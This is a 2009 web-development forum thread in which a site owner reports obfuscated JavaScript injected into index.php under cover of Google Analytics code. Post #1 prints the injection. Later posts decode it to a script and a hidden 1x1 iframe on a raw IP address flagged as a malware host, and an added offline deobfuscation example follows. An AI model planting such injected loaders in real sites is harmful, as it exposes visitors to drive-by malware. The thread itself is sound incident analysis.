06-11-2009, 03:27 PM, post #1
The Contributor (Join Date: May 2009, Location: LA, CA, Posts: 87, Thanks: 0)
Inserting into the index
I can't think of how it was done; somehow this code got inserted into my index.php at the very bottom. I'm thinking, because the page to log in to the site is behind a password-protected folder and there are no other textareas or text input boxes anywhere else, does this mean the attacker somehow got a correct login and password combination?
I don't know why, but all of this started happening since I used Notepad++ to do my stuff; I've always just done it directly from cPanel. So I'm starting to wonder if my computer got infected with something or... I don't know.
I mean, I'm acknowledging that there might have been an input box or something that I missed behind the login page, but you have to get past it to access that, right, so...
Thank you all for the input.
javascript Code:
<?php echo '<script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-7623457-2"); pageTracker._trackPageview(); } catch(err) {}</script>'; ?>
EDIT:
I just looked through the entire site; I applied stripslashes, strip_tags and mysql_real_escape_string to all of the user inputs that I missed.
Last edited by codefreek: 06-25-2009 at 04:54 PM.
Reason: highlight added.
06-11-2009, 08:42 PM, post #2
The Acquainted (Join Date: May 2007, Location: Your G/F's Closet, Posts: 114, Thanks: 7)
When did you start to use Notepad++? I have been having issues with it lately as well; it seems to be putting all my code onto one line: PHP, CSS, HTML, etc. It is quite frustrating.
I doubt that Notepad++ might be your problem, but perhaps look into another and find out? I recommend Programmer's Notepad; it's quite nice while still being free.
__________________
Real Programmers always confuse Christmas and Halloween because Oct31 == Dec25 - Andrew Rutherford
06-11-2009, 11:36 PM, post #3
The Contributor (Join Date: May 2009, Location: LA, CA, Posts: 87, Thanks: 0)
Sorry, double post.
06-11-2009, 11:38 PM, post #4
The Contributor (Join Date: May 2009, Location: LA, CA, Posts: 87, Thanks: 0)
I'm just reaching at the moment; I don't think it's Notepad++ specifically, I just can't think of anything else at the moment. Anyway, like I said earlier, I've already cleaned every POST field in the entire site, even ones that users don't actually input, since I read you can modify POST data with some add-on in Firefox.
I already tried using different SQL injections with the single quote and it's doing OK. <script> inserts don't work either.
As for when I started using Notepad++, it's been a month already. I actually like using it; it does work for me, seriously. It just fails uploads sometimes, and when it does it leaves the original file you're editing blank.
06-11-2009, 11:39 PM, post #5
La Vida es Sueño (Join Date: Sep 2007, Location: Oldham, Posts: 2,280, Thanks: 90)
Was that code actually embedded in a physical file? As in, it wasn't pulled from the database or elsewhere such as that. To actually write to the file would require a different type of attack than a simple submit via a form.
__________________
The man who comes back through the Door in the Wall will never be quite the same as the man who went out.
06-11-2009, 11:40 PM, post #6
The Contributor (Join Date: May 2009, Location: LA, CA, Posts: 87, Thanks: 0)
Wildhoney, yeah. That code that I posted, I found it at the very bottom of the index.php. It's actually there; it's not fetched from another location.
I'll just say it: I'm not really that familiar with any other kind of attack other than the SQL thing.
Also, it's a shared server at Lunarpages.
EDIT:
The same thing happened a week ago. But the code was slightly different; I wasn't able to save a copy of it. But all I remember is what it does. It embeds an iframe that sort of runs a JavaScript function at another site. All of this was constructed using JavaScript, letter by letter almost. I found out about it when I went to the index page and the antivirus detected it. I unescaped the injected code and checked the domain it points to, and it's some company in Asia, Singapore I think, I can't remember. And it was in the same location, at the very end of the index.php.
Last edited by cecilia: 06-12-2009 at 12:02 AM.
06-12-2009, 12:07 AM, post #7
The Contributor (Join Date: Nov 2008, Location: Norway, Posts: 58, Thanks: 20)
I did some research, and apparently the JavaScript code is requesting a JavaScript file from a Ukrainian-registered server. Most of the code is Google Analytics code, used to track visitors on your site.
Most of the code is perfectly safe. It is the following part I am worried about:
Code:
'#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '')
I will try to figure out what it means while you secure your scripts (and preferably move your site to a safer shared server).
06-12-2009, 12:08 AM, post #8
The Acquainted (Join Date: May 2007, Location: Your G/F's Closet, Posts: 114, Thanks: 7)
EDIT: I basically said the same thing as Runar; it's just Google Analytics code, and the other part I do not know. If you can give me the server name you are on at Lunarpages, I will look into it, as I am a jr. server admin.
06-12-2009, 12:14 AM, post #9
The Contributor (Join Date: May 2009, Location: LA, CA, Posts: 87, Thanks: 0)
Yeah, I'll still look around the site in case there's just anything that I missed, and change all of the passwords for everything too, I guess. I'm out of ideas at the moment, and maybe I'll consider moving it. I know, people have been saying it should be on a dedicated server, but I don't have that much money to spare every month. If I did, I would have.
Thank you all for the reply and the help.
EDIT:
What I'm thinking is it may be just a harmless thing, but the fact that they can write to a file, and as PHP, it's... I'll observe and check it every day from now on. What I'm worried about is also what Wildhoney said, that it may not be form-related at all and it's something that I can't control or do anything about.
06-12-2009, 12:25 AM, post #10
The Acquainted (Join Date: May 2007, Location: Your G/F's Closet, Posts: 114, Thanks: 7)
If you want another host, you are more than welcome to let me know, as I am also the owner of a new shared/reseller hosting company and I can provide you with great support. I also have a staff member who lives in the UK who will be able to help when I am not, but seeing as how you are in LA, I will most likely be helping you, as that is where I am myself. My server is not hosted by Lunarpages; I work there to afford my other server.
06-12-2009, 12:28 AM, post #11
The Contributor (Join Date: Nov 2008, Location: Norway, Posts: 58, Thanks: 20)
I "cracked" the code. The solution itself was in the code, and this is the site it redirects to:
http://91.212.65.148/ga.js
I visited that link and ended up with another JavaScript snippet. I "cracked" that one and ended up with an iframe:
HTML Code:
<iframe src="http://91.212.65.148//image/index.php" width=1 height=1></iframe>
The site is apparently reported as an attack site, so Firefox warns me about visiting it. It has "hosted malicious software over the past 90 days. It infected 509 domain(s)" according to Google.
Some additional information: malicious software includes 126 trojan(s), 36 scripting exploit(s), 13 exploit(s).
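The unscrambling Runar describes in posts #7 and #11, as an added example that is not part of the original thread or the attacker's code: it applies the injected snippet's own replace() call to the obfuscated string from post #1 and rebuilds the tag that the snippet's document.write(unescape(...)) emits, so the real script URL can be read offline without running anything remote. The string, the regular expression, the "sr?=" attribute and the IP address all come from the page; the function names are this example's own.

```javascript
// Added example, not code from the original thread. It reproduces what the
// injected snippet from post #1 does to its obfuscated string, offline, so the
// real script URL can be read without ever running the attacker's code.

// Copied from the injected code: the scrambled string and the regular
// expression whose replace() call unscrambles it (the \' in the PHP source
// is just a single quote once PHP has echoed it).
const OBFUSCATED =
  "#@!s(&r)c@#=!)'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)";
const FILLER = /#|@|&|\$|\)|\!|\^|\(/ig;

// Drop every filler character; what is left is a src attribute.
function deobfuscate(s) {
  return s.replace(FILLER, '');
}

// Rebuild the markup the snippet's document.write(unescape(...)) emits.
// The original picks the host from document.location.protocol; pass
// 'http:' or 'https:' here. decodeURIComponent stands in for the legacy
// unescape(), which for the %3C/%3E sequences used here gives the same result.
function buildWrittenTag(protocol) {
  const gaJsHost = (protocol === 'https:') ? 'https://ssl.' : 'http://www.';
  const encoded =
    "%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " +
    deobfuscate(OBFUSCATED) +
    "' type='text/javascript'%3E%3C/script%3E";
  return decodeURIComponent(encoded);
}

// List the src attributes of <script> tags. The first attribute the injected
// tag carries is named "sr?", not "src": browsers ignore unknown attribute
// names, so the google-analytics.com URL is decoration and the only script
// actually fetched is the one from the decoded string.
function externalScriptSources(html) {
  const sources = [];
  const re = /<script\b[^>]*?\bsrc\s*=\s*(['"])([^'"]*)\1/gi;
  let m;
  while ((m = re.exec(html)) !== null) sources.push(m[2]);
  return sources;
}

console.log(deobfuscate(OBFUSCATED));            // src='http://91.212.65.148/ga.js
console.log(buildWrittenTag('http:'));
console.log(externalScriptSources(buildWrittenTag('http:')));
```

Run it with node and compare the last line with the tag you see in the page source: a real Google Analytics include has exactly one src, and it does not point at a bare IP address.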
06-12-2009, 12:33 AM, post #12
The Acquainted (Join Date: May 2007, Location: Your G/F's Closet, Posts: 114, Thanks: 7)
Cheers Runar, thanks for passing that along :D
06-12-2009, 12:42 AM, post #13
The Contributor (Join Date: Nov 2008, Location: Norway, Posts: 58, Thanks: 20)
You are most welcome!
I am glad I could help, and I hope you succeed in closing the (security) hole that made this possible :)
06-12-2009, 12:50 AM, post #14
The Acquainted (Join Date: May 2007, Location: Your G/F's Closet, Posts: 114, Thanks: 7)
It is possible that it is our end, but it may be a security leak in his script, so I am going to look into it and I will figure out what is going on.
06-12-2009, 01:04 AM, post #15
La Vida es Sueño (Join Date: Sep 2007, Location: Oldham, Posts: 2,280, Thanks: 90)
It would be unlikely for a hacker to have targeted your website specifically, I think. Mostly they will write a script that targets popular web software, such as vBulletin on TalkPHP. This allows them to exploit as many websites as possible with the least research possible. It could be that Lunarpages has a security issue regarding one or two of its scripts. I have a Lunarpages account for one of my websites, and I know they do send out automatic emails notifying you of any vulnerable scripts, so they are quite security conscious, it would appear.
The good news, I suppose, is that it's not so much a security hole in your application, but rather Lunarpages. Try contacting Lunarpages and tell them what happened. Hopefully they'll be able to advise.
Runar, in those handful of websites, did you check where they were hosted? If they were all hosted at Lunarpages, then we could narrow the problem down further. Otherwise it may well be that somebody has targeted your website specifically.
06-12-2009, 01:27 AM, post #16
The Acquainted (Join Date: May 2007, Location: Your G/F's Closet, Posts: 114, Thanks: 7)
Wildhoney, that IP is not a Lunarpages IP. I have checked the list and then looked it up; it is a Ukraine-based server/IP address, however it is looking like a neighborhood (home) IP address. I have Lunarpages staff checking the servers now, as I am unable to, due to being off duty and unable to access the servers. Staff will inform all clients on the server if there is a security issue, and it will be fixed.
06-12-2009, 01:32 AM, post #17
La Vida es Sueño (Join Date: Sep 2007, Location: Oldham, Posts: 2,280, Thanks: 90)
I mean the websites that were targeted. Were they all hosted on Lunarpages?
06-12-2009, 01:59 AM, post #18
The Acquainted (Join Date: May 2007, Location: Your G/F's Closet, Posts: 114, Thanks: 7)
Ah, that I don't know. I tried to find it but couldn't, so we will have to wait for Runar.
06-12-2009, 05:21 AM, post #19
The Contributor (Join Date: May 2009, Location: LA, CA, Posts: 87, Thanks: 0)
Just real quick, I found something that sounds just like my case; this is a response to him. I don't know who the web host is, I just found it using Yahoo search.
Quote:
Hello Gary,
Your website hosting has been injected with some iframe code, so download your index page, remove the iframe injection and re-upload. Your website hosting is not loading on my end, as it times out after some time, so I will let you know the exact code of the injection once the website hosting loads.
You need to request your web hosting company to upgrade the kernel on your server and improve the security of the server to block such injections. We had a similar problem on 2 of our servers, but that was due to a failure of the kernel upgrade on those servers, and we finally managed to upgrade the kernel on those servers after some deep research on the hardware configuration we had for those 2 servers.
As of now you can remove the injection from your end, but if the kernel is not upgraded soon then the injection will occur again.
Somehow I agree; I don't think the hacker really targeted me. From what I heard, these types of things are automated. Anyway, I think I've almost done what I can at the site, even removed old unused files, not that I think that even makes a difference.
If it happens again I'll try something different. I mean, it does attack just the index always... maybe get around the file somehow. Too tired to think.
Thanks again everyone.
EDIT:
So the source of the problem isn't some other website hosted on the same server as me, right, and they're connecting from Ukraine.
I know this is a horrible thing; I mean, for God's sake, I am being victimized by it, but still, you have to admit that it's really interesting how they're doing it; good skills but evil intentions, huh.
06-12-2009, 08:17 AM, post #20
The Contributor (Join Date: Nov 2008, Location: Norway, Posts: 58, Thanks: 20)
Have you written your site yourself, or do you use existing software such as WordPress? If you do use other software, then I suggest you upgrade to the newest version available.
Do you have any sort of logging yourself, or is it possible with Lunarpages to log all activity on your site?
Wildhoney: the ones I found apart from this one? None said anything about Lunarpages, so I guess not.